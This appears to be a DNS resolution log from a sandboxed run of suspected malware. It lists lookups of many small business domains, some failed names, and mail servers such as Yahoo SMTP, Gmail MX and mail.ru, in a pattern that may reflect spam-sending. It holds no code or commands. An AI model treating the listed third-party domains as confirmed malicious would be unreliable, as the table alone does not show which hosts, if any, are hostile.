                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:10.043215036 CEST8.8.8.8192.168.2.40xe823No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:10.311106920 CEST8.8.8.8192.168.2.40x1fbbNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:10.438100100 CEST8.8.8.8192.168.2.40x1fbbNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:11.041295052 CEST8.8.8.8192.168.2.40x61f1No error (0)www.netcr.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:11.041295052 CEST8.8.8.8192.168.2.40x61f1No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:11.041295052 CEST8.8.8.8192.168.2.40x61f1No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:11.041295052 CEST8.8.8.8192.168.2.40x61f1No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:11.347085953 CEST8.8.8.8192.168.2.40x1fbbNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.096014023 CEST8.8.8.8192.168.2.40xd0bbNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.120044947 CEST8.8.8.8192.168.2.40xa83fNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.120044947 CEST8.8.8.8192.168.2.40xa83fNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.440499067 CEST8.8.8.8192.168.2.40xc1d9No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.842329979 CEST8.8.8.8192.168.2.40xa2e7No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.842329979 CEST8.8.8.8192.168.2.40xa2e7No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.842329979 CEST8.8.8.8192.168.2.40xa2e7No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.842329979 CEST8.8.8.8192.168.2.40xa2e7No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.842329979 CEST8.8.8.8192.168.2.40xa2e7No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.842329979 CEST8.8.8.8192.168.2.40xa2e7No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.050014019 CEST8.8.8.8192.168.2.40x7c84No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.442272902 CEST8.8.8.8192.168.2.40xba87No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.152776003 CEST8.8.8.8192.168.2.40x1d76No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.152776003 CEST8.8.8.8192.168.2.40x1d76No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.934427023 CEST8.8.8.8192.168.2.40x8dffNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.232841969 CEST8.8.8.8192.168.2.40xd36aNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.232841969 CEST8.8.8.8192.168.2.40xd36aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.232841969 CEST8.8.8.8192.168.2.40xd36aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.232841969 CEST8.8.8.8192.168.2.40xd36aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.232841969 CEST8.8.8.8192.168.2.40xd36aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.975410938 CEST8.8.8.8192.168.2.40x4b74No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.404920101 CEST8.8.8.8192.168.2.40x4449No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.404920101 CEST8.8.8.8192.168.2.40x4449No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.826617002 CEST8.8.8.8192.168.2.40xfa8dName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.148349047 CEST8.8.8.8192.168.2.40xedf5No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.148349047 CEST8.8.8.8192.168.2.40xedf5No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.148349047 CEST8.8.8.8192.168.2.40xedf5No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.087131977 CEST8.8.8.8192.168.2.40xbc35No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.087131977 CEST8.8.8.8192.168.2.40xbc35No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.438549042 CEST8.8.8.8192.168.2.40x29cdName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.452564955 CEST8.8.8.8192.168.2.40xfe3Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.455760002 CEST8.8.8.8192.168.2.40x7f2eNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.455760002 CEST8.8.8.8192.168.2.40x7f2eNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.720330000 CEST8.8.8.8192.168.2.40x6a2No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.249881029 CEST8.8.8.8192.168.2.40x71fcNo error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.249881029 CEST8.8.8.8192.168.2.40x71fcNo error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.249881029 CEST8.8.8.8192.168.2.40x71fcNo error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.249881029 CEST8.8.8.8192.168.2.40x71fcNo error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.249881029 CEST8.8.8.8192.168.2.40x71fcNo error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.478074074 CEST8.8.8.8192.168.2.40xfa8aNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.478074074 CEST8.8.8.8192.168.2.40xfa8aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.478074074 CEST8.8.8.8192.168.2.40xfa8aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.478074074 CEST8.8.8.8192.168.2.40xfa8aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.478074074 CEST8.8.8.8192.168.2.40xfa8aNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.897135019 CEST8.8.8.8192.168.2.40x65f3No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.081578970 CEST8.8.8.8192.168.2.40x1531No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.127855062 CEST8.8.8.8192.168.2.40x3b02No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.127855062 CEST8.8.8.8192.168.2.40x3b02No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.315152884 CEST8.8.8.8192.168.2.40xd0fdNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.406066895 CEST8.8.8.8192.168.2.40x8907No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.599493980 CEST8.8.8.8192.168.2.40xc7c4No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.978763103 CEST8.8.8.8192.168.2.40x2c8eNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.427134037 CEST8.8.8.8192.168.2.40x289aNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.557575941 CEST8.8.8.8192.168.2.40x775aNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.589570045 CEST8.8.8.8192.168.2.40x96eaNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.589570045 CEST8.8.8.8192.168.2.40x96eaNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.589570045 CEST8.8.8.8192.168.2.40x96eaNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.786576986 CEST8.8.8.8192.168.2.40x86daNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.972749949 CEST8.8.8.8192.168.2.40x55a1No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.261228085 CEST8.8.8.8192.168.2.40xb5bfNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.650985003 CEST8.8.8.8192.168.2.40xd21bNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.650985003 CEST8.8.8.8192.168.2.40xd21bNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.806041002 CEST8.8.8.8192.168.2.40x5206No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.806041002 CEST8.8.8.8192.168.2.40x5206No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.054888964 CEST8.8.8.8192.168.2.40x1fc1No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.178921938 CEST8.8.8.8192.168.2.40x1c0dNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.205387115 CEST8.8.8.8192.168.2.40xb0d5No error (0)www.x0c.com104.143.9.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.205387115 CEST8.8.8.8192.168.2.40xb0d5No error (0)www.x0c.com104.143.9.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.439910889 CEST8.8.8.8192.168.2.40x6e9dNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.439910889 CEST8.8.8.8192.168.2.40x6e9dNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.439910889 CEST8.8.8.8192.168.2.40x6e9dNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.605971098 CEST8.8.8.8192.168.2.40x44c4No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.911127090 CEST8.8.8.8192.168.2.40xe670No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.146737099 CEST8.8.8.8192.168.2.40x7d3No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.146737099 CEST8.8.8.8192.168.2.40x7d3No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.189136982 CEST8.8.8.8192.168.2.40x8d3No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.191237926 CEST8.8.8.8192.168.2.40xd2Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.588207006 CEST8.8.8.8192.168.2.40x2a47No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.588207006 CEST8.8.8.8192.168.2.40x2a47No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.717005968 CEST8.8.8.8192.168.2.40x60f5No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.717005968 CEST8.8.8.8192.168.2.40x60f5No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.963368893 CEST8.8.8.8192.168.2.40x401bNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.021367073 CEST8.8.8.8192.168.2.40x97b1No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.069379091 CEST8.8.8.8192.168.2.40x887cNo error (0)www.x0c.com104.143.9.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.069379091 CEST8.8.8.8192.168.2.40x887cNo error (0)www.x0c.com104.143.9.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.997384071 CEST8.8.8.8192.168.2.40x6c7bName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:29.055130005 CEST8.8.8.8192.168.2.40x3366No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:29.055130005 CEST8.8.8.8192.168.2.40x3366No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.235182047 CEST8.8.8.8192.168.2.40x1fe8No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.235182047 CEST8.8.8.8192.168.2.40x1fe8No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.645562887 CEST8.8.8.8192.168.2.40xbaf3No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.645612955 CEST8.8.8.8192.168.2.40x9d1dNo error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:31.736797094 CEST8.8.8.8192.168.2.40xf33aNo error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:31.736797094 CEST8.8.8.8192.168.2.40xf33aNo error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.219109058 CEST8.8.8.8192.168.2.40xe319No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.219109058 CEST8.8.8.8192.168.2.40xe319No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.219109058 CEST8.8.8.8192.168.2.40xe319No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.219109058 CEST8.8.8.8192.168.2.40xe319No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.245130062 CEST8.8.8.8192.168.2.40xc8f0No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.250998020 CEST8.8.8.8192.168.2.40x4684No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.254276991 CEST8.8.8.8192.168.2.40xf7deNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.254887104 CEST8.8.8.8192.168.2.40x2872No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.286770105 CEST8.8.8.8192.168.2.40x21d4No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.288249016 CEST8.8.8.8192.168.2.40xf86aNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.288249016 CEST8.8.8.8192.168.2.40xf86aNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.294239044 CEST8.8.8.8192.168.2.40xd8dcNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.306214094 CEST8.8.8.8192.168.2.40xf30dNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.306214094 CEST8.8.8.8192.168.2.40xf30dNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.306245089 CEST8.8.8.8192.168.2.40xdc51No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.306245089 CEST8.8.8.8192.168.2.40xdc51No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.327408075 CEST8.8.8.8192.168.2.40x28eaNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.330377102 CEST8.8.8.8192.168.2.40x4c02No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.330377102 CEST8.8.8.8192.168.2.40x4c02No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.377438068 CEST8.8.8.8192.168.2.40xa8a0No error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.380620003 CEST8.8.8.8192.168.2.40x35a8No error (0)shittas.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.403554916 CEST8.8.8.8192.168.2.40x137cNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.427064896 CEST8.8.8.8192.168.2.40xd4dbNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.427064896 CEST8.8.8.8192.168.2.40xd4dbNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.427064896 CEST8.8.8.8192.168.2.40xd4dbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.427064896 CEST8.8.8.8192.168.2.40xd4dbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.474412918 CEST8.8.8.8192.168.2.40x47f4No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.474412918 CEST8.8.8.8192.168.2.40x47f4No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.525091887 CEST8.8.8.8192.168.2.40x77c1No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.543375015 CEST8.8.8.8192.168.2.40xeb8aNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.547060013 CEST8.8.8.8192.168.2.40xa451No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.547060013 CEST8.8.8.8192.168.2.40xa451No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.547060013 CEST8.8.8.8192.168.2.40xa451No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.547060013 CEST8.8.8.8192.168.2.40xa451No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.575634956 CEST8.8.8.8192.168.2.40x97bbNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.593303919 CEST8.8.8.8192.168.2.40x7c3aName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.609488010 CEST8.8.8.8192.168.2.40x54a6No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.624952078 CEST8.8.8.8192.168.2.40x478fName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.669962883 CEST8.8.8.8192.168.2.40x8703No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.669962883 CEST8.8.8.8192.168.2.40x8703No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.669962883 CEST8.8.8.8192.168.2.40x8703No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.669962883 CEST8.8.8.8192.168.2.40x8703No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.669962883 CEST8.8.8.8192.168.2.40x8703No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.669962883 CEST8.8.8.8192.168.2.40x8703No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.673927069 CEST8.8.8.8192.168.2.40xbf35No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.680120945 CEST8.8.8.8192.168.2.40xa851No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.684912920 CEST8.8.8.8192.168.2.40xc9a9No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.702570915 CEST8.8.8.8192.168.2.40x3763No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.714726925 CEST8.8.8.8192.168.2.40xdfb7Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.747569084 CEST8.8.8.8192.168.2.40x73a0Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.786655903 CEST8.8.8.8192.168.2.40x3913No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.100.19A (IP address)IN (0x0001)false
